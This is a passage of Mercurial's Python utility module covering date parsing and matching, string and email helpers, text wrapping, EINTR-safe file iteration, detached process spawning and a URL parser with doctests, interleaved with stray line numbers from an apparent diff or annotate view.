    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    return encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1992
1997
def shortdate(date=None):
    # fix: the original docstring said "iso 8631"; the date standard is
    # ISO 8601 (YYYY-MM-DD)
    """turn (timestamp, tzoff) tuple into an ISO 8601 date (YYYY-MM-DD)."""
    return datestr(date, format='%Y-%m-%d')
1996
2001
def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair"""

    # named zones: only GMT/UTC are recognized
    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = 1 if s[-5] == "+" else -1
        hours = int(s[-4:-2])
        minutes = int(s[-2:])
        seconds = (hours * 60 + minutes) * 60
        return -sign * seconds, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = 1 if s[-6] == "+" else -1
        hours = int(s[-5:-3])
        minutes = int(s[-2:])
        seconds = (hours * 60 + minutes) * 60
        return -sign * seconds, s[:-6]

    # no timezone found
    return None, s
2024
2029
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults, walking from most specific
    # (seconds) to least specific (year)
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        if any(("%" + p) in format for p in part):
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True
        else:
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
2057
2062
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(
    ...     datetime.date.today().strftime('%b %d').encode('ascii'))
    True
    >>> parsedate(b'yesterday ') == parsedate(
    ...     (datetime.date.today() - datetime.timedelta(days=1)
    ...     ).strftime('%b %d').encode('ascii'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        # already parsed
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime(r'%b %d')
        date = encoding.strtolocal(date)
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime(r'%b %d')
        date = encoding.strtolocal(date)

    try:
        # fast path: a raw "unixtime offset" pair
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                b = "00" if part[0:1] in "HMS" else "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                continue
            break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2136
2141
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # round unspecified fields down (January 1st, midnight)
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # round unspecified fields up (December 31st, 23:59:59),
        # probing downward for the last valid day of the month
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except Abort:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # "-N": within the last N days
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: start <= x <= stop
    else:
        start, stop = lower(date), upper(date)
        return lambda x: start <= x <= stop
2212
2217
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        # Explicit regular expression: compile it (case-insensitively if
        # requested) and match by searching anywhere in the candidate.
        pattern = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    if pattern.startswith('literal:'):
        # Explicit literal: strip the prefix; anything else falls through
        # and is treated as a literal as-is.
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2271
2276
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # Drop the domain part of an email address.
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    # In "Name <addr>" forms, keep only what follows the '<'.
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    # Finally truncate at the first space, then at the first dot.
    for sep in (' ', '.'):
        pos = user.find(sep)
        if pos >= 0:
            user = user[:pos]
    return user
2287
2292
def emailuser(user):
    """Return the user portion of an email address."""
    # Strip the domain, then anything up to and including a '<'.
    user = user.split('@', 1)[0]
    lt = user.find('<')
    return user[lt + 1:] if lt >= 0 else user
2297
2302
def email(author):
    '''get email of author.'''
    # Take the span between '<' and '>'; with no angle brackets the
    # whole string is assumed to already be an address.
    start = author.find('<') + 1
    end = author.find('>')
    if end == -1:
        return author[start:]
    return author[start:end]
2304
2309
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # Delegate to the width-aware trimmer so multi-column (East Asian)
    # characters are counted by display width, not byte length.
    trimmed = encoding.trim(text, maxlength, ellipsis='...')
    return trimmed
2308
2313
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def render(count):
        magnitude = abs(count)
        # First (largest) unit whose threshold the magnitude reaches wins.
        for multiplier, divisor, fmt in unittable:
            threshold = divisor * multiplier
            if magnitude < threshold:
                continue
            return fmt % (count / float(divisor))
        # Nothing reached its threshold: render with the smallest unit.
        return unittable[-1][2] % count

    return render
2319
2324
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    # Reject an empty/backwards range, then enforce 1-based input.
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # Convert to a Python-style half-open 0-based range.
    return fromline - 1, toline
2340
2345
# bytecount: render a byte quantity with a human-readable unit.  Entries
# are tried in order, so the first (largest) unit whose threshold
# (multiplier * divisor) is reached wins; the final (1, 1, bytes) entry
# guarantees a fallback for small values.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2353
2358
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
# Shared by tolf()/tocrlf() below.
_eolre = remod.compile(br'\r*\n')
2358
2363
def tolf(s):
    """Normalize all line endings in s to a single LF."""
    return _eolre.sub('\n', s)
2361
2366
def tocrlf(s):
    """Normalize all line endings in s to CRLF."""
    return _eolre.sub('\r\n', s)
2364
2369
# Pick EOL converters once at import time based on the platform's
# native line separator.
if pycompat.oslinesep == '\r\n':
    # Native EOL is CRLF (Windows): convert on the way out/in.
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # Native EOL is already LF: no conversion needed.
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2371
2376
def escapestr(s):
    """Render the bytes of s with backslash escape sequences.

    codecs.escape_encode is the C routine underlying
    s.encode('string_escape') on Python 2; calling it directly keeps
    this working on Python 3 as well.
    """
    encoded, _length = codecs.escape_encode(s)
    return encoded
2376
2381
def unescapestr(s):
    """Inverse of escapestr(): interpret backslash escape sequences in s."""
    decoded, _length = codecs.escape_decode(s)
    return decoded
2379
2384
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        result = pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # Non-ascii data cannot be encoded directly; round-trip through
        # the local encoding instead (may be lossy).
        result = pycompat.bytestr(encoding.strtolocal(str(obj)))
    return result
2388
2393
def uirepr(s):
    """repr() variant suited for UI display."""
    text = repr(s)
    # Avoid double backslash in Windows path repr()
    return text.replace('\\\\', '\\')
2392
2397
# delay import of textwrap
def MBTextWrapper(**kwargs):
    # NOTE: on first call this rebinds the module-level name MBTextWrapper
    # to the class itself (see the `global` at the bottom), so the class
    # body is only built once.
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr so the head occupies at most space_left display
            # columns; returns (head, remainder).
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            # At least one column must remain, even for zero-width budgets.
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                # Cannot break the word: put it on a line of its own.
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2496
2501
def wrap(line, width, initindent='', hangindent=''):
    """Word-wrap line to at most width display columns.

    initindent prefixes the first output line, hangindent all later
    ones; byte strings are decoded/re-encoded with the configured
    encoding so wrapping is done on unicode text.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    enc = pycompat.sysstr(encoding.encoding)
    encmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(enc, encmode)
    initindent = initindent.decode(enc, encmode)
    hangindent = hangindent.decode(enc, encmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(enc)
2512
2517
# Define iterfile(fp) -- an EINTR-safe way to iterate over a file object.
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    # Emit every complete line; keep any trailing partial
                    # line buffered for the next read.
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        # Regular on-disk files are treated as "fast" and iterated
        # directly; only slow fds (pipes, sockets, ttys) pay for the
        # EINTR-safe wrapper.
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2584
2589
def iterlines(iterator):
    """Yield each line of every chunk produced by iterator."""
    for chunk in iterator:
        lines = chunk.splitlines()
        for current in lines:
            yield current
2589
2594
def expandpath(path):
    """Expand environment variables, then a leading ~user, in path."""
    expanded = os.path.expandvars(path)
    return os.path.expanduser(expanded)
2592
2597
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    # Frozen binary: the executable itself is the command.
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2607
2612
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # Reap the child and remember its (pid, status) so the polling
        # loop below can detect early exit.
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD does not exist on all platforms (e.g. Windows).
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # condfn is re-checked after the liveness test to avoid a
            # race where the child satisfies the condition and exits.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # Always restore the previous SIGCHLD handler.
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2642
2647
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.

    The caller's mapping is never modified.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Fix: work on a copy so the doubled-prefix entry is not leaked
        # into the caller's dict (the original mutated `mapping` here).
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667
2672
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric: fall through to a service-name lookup
        try:
            return socket.getservbyname(port)
        except socket.error:
            raise Abort(_("no port number associated with service '%s'")
                        % port)
2684
2689
# spellings accepted by parsebool(), mapped to the boolean they denote
_booleans = dict.fromkeys(('1', 'yes', 'true', 'on', 'always'), True)
_booleans.update(dict.fromkeys(('0', 'no', 'false', 'off', 'never'), False))

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower())
2695
2700
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2701 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 for a in string.hexdigits for b in string.hexdigits)
2702 for a in string.hexdigits for b in string.hexdigits)
2698
2703
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unescaped when quoting user/passwd components
    _safechars = "!~*'()+"
    # characters left unescaped when quoting path/fragment components
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        # the fragment is split off first so later splitting ignores it
        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        # split off a leading 'scheme:'; anything without one stays local
        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        # local paths need no further decomposition
        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        # peel credentials off the front of the authority
        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        # show only the components that were actually parsed
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                # bracketed IPv6 literals are emitted verbatim
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

